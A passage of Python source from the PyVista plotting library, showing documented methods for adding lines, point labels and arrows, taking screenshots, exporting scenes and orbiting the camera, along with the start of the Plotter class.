* ``color='white'``
* ``color='w'``
* ``color=[1.0, 1.0, 1.0]``
* ``color='#FFFFFF'``
width : float, optional
Thickness of lines.
label : str, optional
String label to use when adding a legend to the scene with
:func:`pyvista.BasePlotter.add_legend`.
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Returns
-------
vtk.vtkActor
Lines actor.
Examples
--------
>>> import numpy as np
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> points = np.array([[0, 1, 0], [1, 0, 0], [1, 1, 0], [2, 0, 0]])
>>> actor = pl.add_lines(points, color='yellow', width=3)
>>> pl.camera_position = 'xy'
>>> pl.show()
"""
if not isinstance(lines, np.ndarray):
raise TypeError('Input should be an array of point segments')
lines = pyvista.lines_from_points(lines)
# Create mapper and add lines
mapper = _vtk.vtkDataSetMapper()
mapper.SetInputData(lines)
rgb_color = Color(color)
# Create actor
actor = _vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetLineWidth(width)
actor.GetProperty().EdgeVisibilityOn()
actor.GetProperty().SetEdgeColor(rgb_color.float_rgb)
actor.GetProperty().SetColor(rgb_color.float_rgb)
actor.GetProperty().LightingOff()
# legend label
if label:
if not isinstance(label, str):
raise TypeError('Label must be a string')
addr = actor.GetAddressAsString("")
self.renderer._labels[addr] = [lines, label, rgb_color]
# Add to renderer
self.add_actor(actor, reset_camera=False, name=name, pickable=False)
return actor
@wraps(ScalarBars.remove_scalar_bar)
def remove_scalar_bar(self, *args, **kwargs):
"""Remove the active scalar bar."""
self.scalar_bars.remove_scalar_bar(*args, **kwargs)
def add_point_labels(
self,
points,
labels,
italic=False,
bold=True,
font_size=None,
text_color=None,
font_family=None,
shadow=False,
show_points=True,
point_color=None,
point_size=5,
name=None,
shape_color='grey',
shape='rounded_rect',
fill_shape=True,
margin=3,
shape_opacity=1.0,
pickable=False,
render_points_as_spheres=False,
tolerance=0.001,
reset_camera=None,
always_visible=False,
render=True,
):
"""Create a point actor with one label from list labels assigned to each point.
Parameters
----------
points : sequence or pyvista.DataSet
An ``n x 3`` sequence points or pyvista dataset with points.
labels : list or str
List of labels. Must be the same length as points. If a
string name is given with a :class:`pyvista.DataSet` input for
points, then these are fetched.
italic : bool, optional
Italicises title and bar labels. Default ``False``.
bold : bool, optional
Bolds title and bar labels. Default ``True``.
font_size : float, optional
Sets the size of the title font. Defaults to 16.
text_color : color_like, optional
Color of text. Either a string, RGB sequence, or hex color string.
* ``text_color='white'``
* ``text_color='w'``
* ``text_color=[1.0, 1.0, 1.0]``
* ``text_color='#FFFFFF'``
font_family : str, optional
Font family. Must be either ``'courier'``, ``'times'``,
or ``'arial``.
shadow : bool, optional
Adds a black shadow to the text. Defaults to ``False``.
show_points : bool, optional
Controls if points are visible. Default ``True``.
point_color : color_like, optional
Either a string, rgb list, or hex color string. One of
the following.
* ``point_color='white'``
* ``point_color='w'``
* ``point_color=[1.0, 1.0, 1.0]``
* ``point_color='#FFFFFF'``
point_size : float, optional
Size of points if visible.
name : str, optional
The name for the added actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
shape_color : color_like, optional
Color of points (if visible). Either a string, rgb
sequence, or hex color string.
shape : str, optional
The string name of the shape to use. Options are ``'rect'`` or
``'rounded_rect'``. If you want no shape, pass ``None``.
fill_shape : bool, optional
Fill the shape with the ``shape_color``. Outlines if ``False``.
margin : int, optional
The size of the margin on the label background shape. Default is 3.
shape_opacity : float, optional
The opacity of the shape in the range of ``[0, 1]``.
pickable : bool, optional
Set whether this actor is pickable.
render_points_as_spheres : bool, optional
Render points as spheres rather than dots.
tolerance : float, optional
A tolerance to use to determine whether a point label is
visible. A tolerance is usually required because the
conversion from world space to display space during
rendering introduces numerical round-off.
reset_camera : bool, optional
Reset the camera after adding the points to the scene.
always_visible : bool, optional
Skip adding the visibility filter. Default False.
render : bool, optional
Force a render when ``True`` (default).
Returns
-------
vtk.vtkActor2D
VTK label actor. Can be used to change properties of the labels.
Examples
--------
>>> import numpy as np
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> points = np.array([[0.0, 0.0, 0.0],
... [1.0, 1.0, 0.0],
... [2.0, 0.0, 0.0]])
>>> labels = ['Point A', 'Point B', 'Point C']
>>> actor = pl.add_point_labels(points, labels, italic=True, font_size=20,
... point_color='red', point_size=20,
... render_points_as_spheres=True,
... always_visible=True, shadow=True)
>>> pl.camera_position = 'xy'
>>> pl.show()
"""
if font_family is None:
font_family = self._theme.font.family
if font_size is None:
font_size = self._theme.font.size
point_color = Color(point_color, default_color=self._theme.color)
if isinstance(points, (list, tuple)):
points = np.array(points)
if isinstance(points, np.ndarray):
vtkpoints = pyvista.PolyData(points) # Cast to poly data
elif is_pyvista_dataset(points):
vtkpoints = pyvista.PolyData(points.points)
if isinstance(labels, str):
labels = points.point_data[labels]
else:
raise TypeError(f'Points type not usable: {type(points)}')
if len(vtkpoints.points) != len(labels):
raise ValueError('There must be one label for each point')
if name is None:
name = f'{type(vtkpoints).__name__}({vtkpoints.memory_address})'
vtklabels = _vtk.vtkStringArray()
vtklabels.SetName('labels')
for item in labels:
vtklabels.InsertNextValue(str(item))
vtkpoints.GetPointData().AddArray(vtklabels)
# Create hierarchy
hier = _vtk.vtkPointSetToLabelHierarchy()
hier.SetLabelArrayName('labels')
if always_visible:
hier.SetInputData(vtkpoints)
else:
# Only show visible points
vis_points = _vtk.vtkSelectVisiblePoints()
vis_points.SetInputData(vtkpoints)
vis_points.SetRenderer(self.renderer)
vis_points.SetTolerance(tolerance)
hier.SetInputConnection(vis_points.GetOutputPort())
# create label mapper
labelMapper = _vtk.vtkLabelPlacementMapper()
labelMapper.SetInputConnection(hier.GetOutputPort())
if not isinstance(shape, str):
labelMapper.SetShapeToNone()
elif shape.lower() in 'rect':
labelMapper.SetShapeToRect()
elif shape.lower() in 'rounded_rect':
labelMapper.SetShapeToRoundedRect()
else:
raise ValueError(f'Shape ({shape}) not understood')
if fill_shape:
labelMapper.SetStyleToFilled()
else:
labelMapper.SetStyleToOutline()
labelMapper.SetBackgroundColor(Color(shape_color).float_rgb)
labelMapper.SetBackgroundOpacity(shape_opacity)
labelMapper.SetMargin(margin)
textprop = hier.GetTextProperty()
textprop.SetItalic(italic)
textprop.SetBold(bold)
textprop.SetFontSize(font_size)
textprop.SetFontFamily(parse_font_family(font_family))
textprop.SetColor(Color(text_color, default_color=self._theme.font.color).float_rgb)
textprop.SetShadow(shadow)
self.remove_actor(f'{name}-points', reset_camera=False)
self.remove_actor(f'{name}-labels', reset_camera=False)
# add points
if show_points:
self.add_mesh(
vtkpoints,
color=point_color,
point_size=point_size,
name=f'{name}-points',
pickable=pickable,
render_points_as_spheres=render_points_as_spheres,
reset_camera=reset_camera,
render=render,
)
label_actor = _vtk.vtkActor2D()
label_actor.SetMapper(labelMapper)
self.add_actor(label_actor, reset_camera=False, name=f'{name}-labels', pickable=False)
return label_actor
def add_point_scalar_labels(self, points, labels, fmt=None, preamble='', **kwargs):
"""Label the points from a dataset with the values of their scalars.
Wrapper for :func:`pyvista.BasePlotter.add_point_labels`.
Parameters
----------
points : numpy.ndarray or pyvista.DataSet
An ``n x 3`` numpy.ndarray or pyvista dataset with points.
labels : str, optional
String name of the point data array to use.
fmt : str, optional
String formatter used to format numerical data.
preamble : str, optional
Text before the start of each label.
**kwargs : dict, optional
Keyword arguments passed to
:func:`pyvista.BasePlotter.add_point_labels`.
Returns
-------
vtk.vtkActor2D
VTK label actor. Can be used to change properties of the labels.
"""
if not is_pyvista_dataset(points):
raise TypeError(f'input points must be a pyvista dataset, not: {type(points)}')
if not isinstance(labels, str):
raise TypeError('labels must be a string name of the scalars array to use')
if fmt is None:
fmt = self._theme.font.fmt
if fmt is None:
fmt = '%.6e'
scalars = points.point_data[labels]
phrase = f'{preamble} %.3e'
labels = [phrase % val for val in scalars]
return self.add_point_labels(points, labels, **kwargs)
def add_points(self, points, **kwargs):
"""Add points to a mesh.
Parameters
----------
points : numpy.ndarray or pyvista.DataSet
Array of points or the points from a pyvista object.
**kwargs : dict, optional
See :func:`pyvista.BasePlotter.add_mesh` for optional
keyword arguments.
Returns
-------
vtk.vtkActor
Actor of the mesh.
Examples
--------
Add a numpy array of points to a mesh.
>>> import numpy as np
>>> import pyvista
>>> points = np.random.random((10, 3))
>>> pl = pyvista.Plotter()
>>> actor = pl.add_points(points, render_points_as_spheres=True,
... point_size=100.0)
>>> pl.show()
"""
kwargs['style'] = 'points'
return self.add_mesh(points, **kwargs)
def add_arrows(self, cent, direction, mag=1, **kwargs):
"""Add arrows to the plotter.
Parameters
----------
cent : np.ndarray
Array of centers.
direction : np.ndarray
Array of direction vectors.
mag : float, optional
Amount to scale the direction vectors.
**kwargs : dict, optional
See :func:`pyvista.BasePlotter.add_mesh` for optional
keyword arguments.
Returns
-------
vtk.vtkActor
VTK actor of the arrows.
Examples
--------
Plot a random field of vectors and save a screenshot of it.
>>> import numpy as np
>>> import pyvista
>>> cent = np.random.random((10, 3))
>>> direction = np.random.random((10, 3))
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_arrows(cent, direction, mag=2)
>>> plotter.show()
"""
if cent.shape != direction.shape: # pragma: no cover
raise ValueError('center and direction arrays must have the same shape')
direction = direction.copy()
if cent.ndim != 2:
cent = cent.reshape((-1, 3))
if direction.ndim != 2:
direction = direction.reshape((-1, 3))
if mag != 1:
direction = direction * mag
pdata = pyvista.vector_poly_data(cent, direction)
# Create arrow object
arrow = _vtk.vtkArrowSource()
arrow.Update()
glyph3D = _vtk.vtkGlyph3D()
glyph3D.SetSourceData(arrow.GetOutput())
glyph3D.SetInputData(pdata)
glyph3D.SetVectorModeToUseVector()
glyph3D.Update()
arrows = wrap(glyph3D.GetOutput())
return self.add_mesh(arrows, **kwargs)
@staticmethod
def _save_image(image, filename, return_img):
"""Save to file and/or return a NumPy image array.
This is an internal helper.
"""
if not image.size:
raise ValueError('Empty image. Have you run plot() first?')
# write screenshot to file if requested
if isinstance(filename, (str, pathlib.Path, io.BytesIO)):
from PIL import Image
if isinstance(filename, (str, pathlib.Path)):
filename = pathlib.Path(filename)
if isinstance(pyvista.FIGURE_PATH, str) and not filename.is_absolute():
filename = pathlib.Path(os.path.join(pyvista.FIGURE_PATH, filename))
if not filename.suffix:
filename = filename.with_suffix('.png')
elif filename.suffix not in SUPPORTED_FORMATS:
raise ValueError(
f'Unsupported extension {filename.suffix}\n'
f'Must be one of the following: {SUPPORTED_FORMATS}'
)
filename = os.path.abspath(os.path.expanduser(str(filename)))
Image.fromarray(image).save(filename)
else:
Image.fromarray(image).save(filename, format="PNG")
# return image array if requested
if return_img:
return image
def save_graphic(self, filename, title='PyVista Export', raster=True, painter=True):
"""Save a screenshot of the rendering window as a graphic file.
This can be helpful for publication documents.
The supported formats are:
* ``'.svg'``
* ``'.eps'``
* ``'.ps'``
* ``'.pdf'``
* ``'.tex'``
Parameters
----------
filename : str
Path to fsave the graphic file to.
title : str, optional
Title to use within the file properties.
raster : bool, optional
Attempt to write 3D properties as a raster image.
painter : bool, optional
Configure the exporter to expect a painter-ordered 2D
rendering, that is, a rendering at a fixed depth where
primitives are drawn from the bottom up.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> pl = pyvista.Plotter()
>>> _ = pl.add_mesh(examples.load_airplane(), smooth_shading=True)
>>> _ = pl.add_background_image(examples.mapfile)
>>> pl.save_graphic("img.svg") # doctest:+SKIP
"""
if not hasattr(self, 'ren_win'):
raise AttributeError('This plotter is closed and unable to save a screenshot.')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
filename = os.path.abspath(os.path.expanduser(filename))
extension = pyvista.fileio.get_ext(filename)
writer = _vtk.lazy_vtkGL2PSExporter()
modes = {
'.svg': writer.SetFileFormatToSVG,
'.eps': writer.SetFileFormatToEPS,
'.ps': writer.SetFileFormatToPS,
'.pdf': writer.SetFileFormatToPDF,
'.tex': writer.SetFileFormatToTeX,
}
if extension not in modes:
raise ValueError(
f"Extension ({extension}) is an invalid choice.\n\n"
f"Valid options include: {', '.join(modes.keys())}"
)
writer.CompressOff()
writer.SetFilePrefix(filename.replace(extension, ''))
writer.SetInput(self.ren_win)
modes[extension]()
writer.SetTitle(title)
writer.SetWrite3DPropsAsRasterImage(raster)
if painter:
writer.UsePainterSettings()
writer.Update()
def screenshot(
self, filename=None, transparent_background=None, return_img=True, window_size=None
):
"""Take screenshot at current camera position.
Parameters
----------
filename : str, pathlib.Path, BytesIO, optional
Location to write image to. If ``None``, no image is written.
transparent_background : bool, optional
Whether to make the background transparent. The default is
looked up on the plotter's theme.
return_img : bool, optional
If ``True`` (the default), a NumPy array of the image will
be returned.
window_size : 2-length tuple, optional
Set the plotter's size to this ``(width, height)`` before
taking the screenshot.
Returns
-------
numpy.ndarray
Array containing pixel RGB and alpha. Sized:
* [Window height x Window width x 3] if
``transparent_background`` is set to ``False``.
* [Window height x Window width x 4] if
``transparent_background`` is set to ``True``.
Examples
--------
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> plotter = pyvista.Plotter(off_screen=True)
>>> actor = plotter.add_mesh(sphere)
>>> plotter.screenshot('screenshot.png') # doctest:+SKIP
"""
if window_size is not None:
self.window_size = window_size
# configure image filter
if transparent_background is None:
transparent_background = self._theme.transparent_background
self.image_transparent_background = transparent_background
# This if statement allows you to save screenshots of closed plotters
# This is needed for the sphinx-gallery to work
if not hasattr(self, 'ren_win'):
# If plotter has been closed...
# check if last_image exists
if self.last_image is not None:
# Save last image
return self._save_image(self.last_image, filename, return_img)
# Plotter hasn't been rendered or was improperly closed
raise RuntimeError('This plotter is closed and unable to save a screenshot.')
if self._first_time and not self.off_screen:
raise RuntimeError(
"Nothing to screenshot - call .show first or use the off_screen argument"
)
# if off screen, show has not been called and we must render
# before extracting an image
if self._first_time:
self._on_first_render_request()
self.render()
return self._save_image(self.image, filename, return_img)
@wraps(Renderers.set_background)
def set_background(self, *args, **kwargs):
"""Wrap ``Renderers.set_background``."""
self.renderers.set_background(*args, **kwargs)
def generate_orbital_path(self, factor=3.0, n_points=20, viewup=None, shift=0.0):
"""Generate an orbital path around the data scene.
Parameters
----------
factor : float, optional
A scaling factor when building the orbital extent.
n_points : int, optional
Number of points on the orbital path.
viewup : list(float), optional
The normal to the orbital plane.
shift : float, optional
Shift the plane up/down from the center of the scene by
this amount.
Returns
-------
pyvista.PolyData
PolyData containing the orbital path.
Examples
--------
Generate an orbital path around a sphere.
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(pyvista.Sphere())
>>> viewup = [0, 0, 1]
>>> orbit = plotter.generate_orbital_path(factor=2.0, n_points=50,
... shift=0.0, viewup=viewup)
See :ref:`orbiting_example` for a full example using this method.
"""
if viewup is None:
viewup = self._theme.camera['viewup']
center = np.array(self.center)
bnds = np.array(self.bounds)
radius = (bnds[1] - bnds[0]) * factor
y = (bnds[3] - bnds[2]) * factor
if y > radius:
radius = y
center += np.array(viewup) * shift
return pyvista.Polygon(center=center, radius=radius, normal=viewup, n_sides=n_points)
def fly_to(self, point):
"""Move the current camera's focal point to a position point.
The movement is animated over the number of frames specified in
NumberOfFlyFrames. The LOD desired frame rate is used.
Parameters
----------
point : sequence
Point to fly to in the form of ``(x, y, z)``.
"""
self.iren.fly_to(self.renderer, point)
def orbit_on_path(
self,
path=None,
focus=None,
step=0.5,
viewup=None,
write_frames=False,
threaded=False,
progress_bar=False,
):
"""Orbit on the given path focusing on the focus point.
Parameters
----------
path : pyvista.PolyData
Path of orbital points. The order in the points is the order of
travel.
focus : list(float) of length 3, optional
The point of focus the camera.
step : float, optional
The timestep between flying to each camera position.
viewup : list(float), optional
The normal to the orbital plane.
write_frames : bool, optional
Assume a file is open and write a frame on each camera
view during the orbit.
threaded : bool, optional
Run this as a background thread. Generally used within a
GUI (i.e. PyQt).
progress_bar : bool, optional
Show the progress bar when proceeding through the path.
This can be helpful to show progress when generating
movies with ``off_screen=True``.
Examples
--------
Plot an orbit around the earth. Save the gif as a temporary file.
>>> import tempfile
>>> import os
>>> import pyvista
>>> filename = os.path.join(tempfile._get_default_tempdir(),
... next(tempfile._get_candidate_names()) + '.gif')
>>> from pyvista import examples
>>> plotter = pyvista.Plotter(window_size=[300, 300])
>>> _ = plotter.add_mesh(examples.load_globe(), smooth_shading=True)
>>> plotter.open_gif(filename)
>>> viewup = [0, 0, 1]
>>> orbit = plotter.generate_orbital_path(factor=2.0, n_points=24,
... shift=0.0, viewup=viewup)
>>> plotter.orbit_on_path(orbit, write_frames=True, viewup=viewup,
... step=0.02)
See :ref:`orbiting_example` for a full example using this method.
"""
if focus is None:
focus = self.center
if viewup is None:
viewup = self._theme.camera['viewup']
if path is None:
path = self.generate_orbital_path(viewup=viewup)
if not is_pyvista_dataset(path):
path = pyvista.PolyData(path)
points = path.points
# Make sure the whole scene is visible
self.camera.thickness = path.length
if progress_bar:
try:
from tqdm import tqdm
except ImportError: # pragma: no cover
raise ImportError("Please install `tqdm` to use ``progress_bar=True``")
def orbit():
"""Define the internal thread for running the orbit."""
if progress_bar:
points_seq = tqdm(points)
else:
points_seq = points
for point in points_seq:
tstart = time.time() # include the render time in the step time
self.set_position(point, render=False)
self.set_focus(focus, render=False)
self.set_viewup(viewup, render=False)
self.renderer.ResetCameraClippingRange()
if write_frames:
self.write_frame()
else:
self.render()
sleep_time = step - (time.time() - tstart)
if sleep_time > 0:
time.sleep(sleep_time)
if write_frames:
self.mwriter.close()
if threaded:
thread = Thread(target=orbit)
thread.start()
else:
orbit()
def export_vtkjs(self, filename, compress_arrays=False):
"""Export the current rendering scene as a VTKjs scene.
It can be used for rendering in a web browser.
Parameters
----------
filename : str
Filename to export the scene to. A filename extension of
``'.vtkjs'`` will be added.
compress_arrays : bool, optional
Enable array compression.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> pl = pyvista.Plotter()
>>> _ = pl.add_mesh(examples.load_hexbeam())
>>> pl.export_vtkjs("sample") # doctest:+SKIP
"""
if not hasattr(self, 'ren_win'):
raise RuntimeError('Export must be called before showing/closing the scene.')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
else:
filename = os.path.abspath(os.path.expanduser(filename))
export_plotter_vtkjs(self, filename, compress_arrays=compress_arrays)
def export_obj(self, filename):
"""Export scene to OBJ format.
Parameters
----------
filename : str
Filename to export the scene to. Should end in ``'.obj'``.
Returns
-------
vtkOBJExporter
Object exporter.
"""
# lazy import vtkOBJExporter here as it takes a long time to
# load and is not always used
try:
from vtkmodules.vtkIOExport import vtkOBJExporter
except: # noqa: E722
from vtk import vtkOBJExporter
if not hasattr(self, "ren_win"):
raise RuntimeError("This plotter must still have a render window open.")
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
else:
filename = os.path.abspath(os.path.expanduser(filename))
exporter = vtkOBJExporter()
exporter.SetFilePrefix(filename)
exporter.SetRenderWindow(self.ren_win)
return exporter.Write()
def __del__(self):
"""Delete the plotter."""
# We have to check here if it has the closed attribute as it
# may not exist should the plotter have failed to initialize.
if hasattr(self, '_closed'):
if not self._closed:
self.close()
self.deep_clean()
if hasattr(self, 'renderers'):
del self.renderers
def add_background_image(self, image_path, scale=1, auto_resize=True, as_global=True):
"""Add a background image to a plot.
Parameters
----------
image_path : str
Path to an image file.
scale : float, optional
Scale the image larger or smaller relative to the size of
the window. For example, a scale size of 2 will make the
largest dimension of the image twice as large as the
largest dimension of the render window. Defaults to 1.
auto_resize : bool, optional
Resize the background when the render window changes size.
as_global : bool, optional
When multiple render windows are present, setting
``as_global=False`` will cause the background to only
appear in one window.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(pyvista.Sphere())
>>> plotter.add_background_image(examples.mapfile)
>>> plotter.show()
"""
if self.renderers.has_active_background_renderer:
raise RuntimeError(
'A background image already exists. '
'Remove it with ``remove_background_image`` '
'before adding one'
)
# Need to change the number of layers to support an additional
# background layer
if not self._has_background_layer:
self.ren_win.SetNumberOfLayers(3)
renderer = self.renderers.add_background_renderer(image_path, scale, as_global)
self.ren_win.AddRenderer(renderer)
# set up autoscaling of the image
if auto_resize: # pragma: no cover
self.iren.add_observer('ModifiedEvent', renderer.resize)
@wraps(Renderers.remove_background_image)
def remove_background_image(self):
"""Wrap ``Renderers.remove_background_image``."""
self.renderers.remove_background_image()
# return the active renderer to the top, otherwise flat background
# will not be rendered
self.renderer.layer = 0
def _on_first_render_request(self, cpos=None):
"""Once an image or render is officially requested, run this routine.
For example on the show call or any screenshot producing code.
"""
# reset unless camera for the first render unless camera is set
if self._first_time: # and not self.camera_set:
for renderer in self.renderers:
if not renderer.camera_set and cpos is None:
renderer.camera_position = renderer.get_default_cam_pos()
renderer.ResetCamera()
elif cpos is not None:
renderer.camera_position = cpos
self._first_time = False
def reset_camera_clipping_range(self):
"""Reset camera clipping planes."""
self.renderer.ResetCameraClippingRange()
def add_light(self, light, only_active=False):
"""Add a Light to the scene.
Parameters
----------
light : Light or vtkLight
The light to be added.
only_active : bool, optional
If ``True``, only add the light to the active
renderer. The default is that every renderer adds the
light. To add the light to an arbitrary renderer, see
:func:`pyvista.plotting.renderer.Renderer.add_light`.
Examples
--------
Create a plotter that we initialize with no lights, and add a
cube and a single headlight to it.
>>> import pyvista as pv
>>> plotter = pv.Plotter(lighting='none')
>>> _ = plotter.add_mesh(pv.Cube())
>>> light = pv.Light(color='cyan', light_type='headlight')
>>> plotter.add_light(light)
>>> plotter.show()
"""
renderers = [self.renderer] if only_active else self.renderers
for renderer in renderers:
renderer.add_light(light)
def remove_all_lights(self, only_active=False):
"""Remove all lights from the scene.
Parameters
----------
only_active : bool
If ``True``, only remove lights from the active
renderer. The default is that lights are stripped from
every renderer.
Examples
--------
Create a plotter and remove all lights after initialization.
Note how the mesh rendered is completely flat
>>> import pyvista as pv
>>> plotter = pv.Plotter()
>>> plotter.remove_all_lights()
>>> plotter.renderer.lights
[]
>>> _ = plotter.add_mesh(pv.Sphere(), show_edges=True)
>>> plotter.show()
Note how this differs from a plot with default lighting
>>> pv.Sphere().plot(show_edges=True, lighting=True)
"""
renderers = [self.renderer] if only_active else self.renderers
for renderer in renderers:
renderer.remove_all_lights()
def where_is(self, name):
"""Return the subplot coordinates of a given actor.
Parameters
----------
name : str
Actor's name.
Returns
-------
list(tuple(int))
A list with the subplot coordinates of the actor.
Examples
--------
>>> import pyvista as pv
>>> plotter = pv.Plotter(shape=(2, 2))
>>> plotter.subplot(0, 0)
>>> _ = plotter.add_mesh(pv.Box(), name='box')
>>> plotter.subplot(0, 1)
>>> _ = plotter.add_mesh(pv.Sphere(), name='sphere')
>>> plotter.subplot(1, 0)
>>> _ = plotter.add_mesh(pv.Box(), name='box')
>>> plotter.subplot(1, 1)
>>> _ = plotter.add_mesh(pv.Cone(), name='cone')
>>> plotter.where_is('box')
[(0, 0), (1, 0)]
>>> plotter.show()
"""
places = []
for index in range(len(self.renderers)):
if name in self.renderers[index]._actors:
places.append(tuple(self.renderers.index_to_loc(index)))
return places
class Plotter(BasePlotter):
"""Plotting object to display vtk meshes or numpy arrays.
Parameters
----------
off_screen : bool, optional
Renders off screen when ``True``. Useful for automated
screenshots.
notebook : bool, optional
When ``True``, the resulting plot is placed inline a jupyter
notebook. Assumes a jupyter console is active. Automatically
enables ``off_screen``.
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one render
window. Can also accept a string descriptor as shape. E.g.:
* ``shape="3|1"`` means 3 plots on the left and 1 on the right,
* ``shape="4/2"`` means 4 plots on top and 2 at the bottom.
border : bool, optional
Draw a border around each render window. Default ``False``.
border_color : color_like, optional
Either a string, rgb list, or hex color string. For example:
* ``color='white'``
* ``color='w'``
* ``color=[1.0, 1.0, 1.0]``
* ``color='#FFFFFF'``
window_size : list, optional
Window size in pixels. Defaults to ``[1024, 768]``, unless
set differently in the relevant theme's ``window_size``
property.
multi_samples : int, optional
The number of multi-samples used to mitigate aliasing. 4 is a
good default but 8 will have better results with a potential
impact on performance.
line_smoothing : bool, optional
If ``True``, enable line smoothing.
polygon_smoothing : bool, optional
If ``True``, enable polygon smoothing.
lighting : str, optional
What lighting to set up for the plotter.
Accepted options:
* ``'light_kit'``: a vtk Light Kit composed of 5 lights.
* ``'three lights'``: illumination using 3 lights.
* ``'none'``: no light sources at instantiation.
The default is a ``'light_kit'`` (to be precise, 5 separate
lights that act like a Light Kit).
theme : pyvista.themes.DefaultTheme, optional
Plot-specific theme.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> another_mesh = examples.load_uniform()
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(mesh, color='red')
>>> actor = plotter.add_mesh(another_mesh, color='blue')
>>> plotter.show()
"""
last_update_time = 0.0
right_timer_id = -1
def __init__(
self,
off_screen=None,
notebook=None,
shape=(1, 1),
groups=None,
row_weights=None,
col_weights=None,
border=None,
border_color='k',
border_width=2.0,
window_size=None,
multi_samples=None,
line_smoothing=False,
point_smoothing=False,
polygon_smoothing=False,
splitting_position=None,
title=None,
lighting='light kit',
theme=None,
):
"""Initialize a vtk plotting object."""
super().__init__(
shape=shape,
border=border,
border_color=border_color,
border_width=border_width,
groups=groups,
row_weights=row_weights,
col_weights=col_weights,
splitting_position=splitting_position,
title=title,
lighting=lighting,
theme=theme,
)
log.debug('Plotter init start')
# check if a plotting backend is enabled
_warn_xserver()
def on_timer(iren, event_id):
"""Exit application if interactive renderer stops."""
if event_id == 'TimerEvent' and self.iren._style != "Context":
self.iren.terminate_app()
if off_screen is None:
off_screen = pyvista.OFF_SCREEN
if notebook is None:
if self._theme.notebook is not None:
notebook = self._theme.notebook
else:
notebook = scooby.in_ipykernel()
self.notebook = notebook
if self.notebook:
off_screen = True
self.off_screen = off_screen
self._window_size_unset = False
if window_size is None:
self._window_size_unset = True
window_size = self._theme.window_size
self.__prior_window_size = window_size
if multi_samples is None:
multi_samples = self._theme.multi_samples
# initialize render window
self.ren_win = _vtk.vtkRenderWindow()
self.ren_win.SetMultiSamples(multi_samples)
self.ren_win.SetBorders(True)
if line_smoothing:
self.ren_win.LineSmoothingOn()
if point_smoothing:
self.ren_win.PointSmoothingOn()
if polygon_smoothing:
self.ren_win.PolygonSmoothingOn()
for renderer in self.renderers:
self.ren_win.AddRenderer(renderer)
# Add the shadow renderer to allow us to capture interactions within
# a given viewport
# https://vtk.org/pipermail/vtkusers/2018-June/102030.html
number_or_layers = self.ren_win.GetNumberOfLayers()
current_layer = self.renderer.GetLayer()
self.ren_win.SetNumberOfLayers(number_or_layers + 1)
self.ren_win.AddRenderer(self.renderers.shadow_renderer)
self.renderers.shadow_renderer.SetLayer(current_layer + 1)
self.renderers.shadow_renderer.SetInteractive(False) # never needs to capture
if self.off_screen:
self.ren_win.SetOffScreenRendering(1)
# vtkGenericRenderWindowInteractor has no event loop and
# allows the display client to close on Linux when
# off_screen. We still want an interactor for off screen
# plotting since there are some widgets (like the axes
# widget) that need an interactor
interactor = _vtk.vtkGenericRenderWindowInteractor()
else:
interactor = None
# Add ren win and interactor
self.iren = RenderWindowInteractor(self, light_follow_camera=False, interactor=interactor)
self.iren.set_render_window(self.ren_win)
self.enable_trackball_style() # internally calls update_style()
self.iren.add_observer("KeyPressEvent", self.key_press_event)
# Set camera widget based on theme. This requires that an
# interactor be present.
if self.theme._enable_camera_orientation_widget:
self.add_camera_orientation_widget()
# Set background
self.set_background(self._theme.background)
# Set window size
self.window_size = window_size
# add timer event if interactive render exists
self.iren.add_observer(_vtk.vtkCommand.TimerEvent, on_timer)
if self._theme.depth_peeling.enabled:
if self.enable_depth_peeling():
for renderer in self.renderers:
renderer.enable_depth_peeling()
log.debug('Plotter init stop')
def show(
self,
title=None,
window_size=None,
interactive=True,
auto_close=None,
interactive_update=False,
full_screen=None,
screenshot=False,
return_img=False,
cpos=None,
use_ipyvtk=None,
jupyter_backend=None,
return_viewer=False,
return_cpos=None,
**kwargs,
):
"""Display the plotting window.
Parameters
----------
title : str, optional
Title of plotting window. Defaults to
:attr:`pyvista.global_theme.title <pyvista.themes.DefaultTheme.title>`.
window_size : list, optional
Window size in pixels. Defaults to
:attr:`pyvista.global_theme.window_size <pyvista.themes.DefaultTheme.window_size>`.
interactive : bool, optional
Enabled by default. Allows user to pan and move figure.
Defaults to
:attr:`pyvista.global_theme.interactive <pyvista.themes.DefaultTheme.interactive>`.
auto_close : bool, optional
Exits plotting session when user closes the window when
interactive is ``True``. Defaults to
:attr:`pyvista.global_theme.auto_close <pyvista.themes.DefaultTheme.auto_close>`.
interactive_update : bool, optional
Disabled by default. Allows user to non-blocking draw,
user should call :func:`BasePlotter.update` in each iteration.
full_screen : bool, optional
Opens window in full screen. When enabled, ignores
``window_size``. Defaults to
:attr:`pyvista.global_theme.full_screen <pyvista.themes.DefaultTheme.full_screen>`.
screenshot : str, pathlib.Path, BytesIO or bool, optional
Take a screenshot of the initial state of the plot.
If a string, it specifies the path to which the screenshot
is saved. If ``True``, the screenshot is returned as an
array. Defaults to ``False``. For interactive screenshots
it's recommended to first call ``show()`` with
``auto_close=False`` to set the scene, then save the
screenshot in a separate call to ``show()`` or
:func:`Plotter.screenshot`.
return_img : bool
Returns a numpy array representing the last image along
with the camera position.
cpos : list(tuple(floats))
The camera position. You can also set this with
:attr:`Plotter.camera_position`.
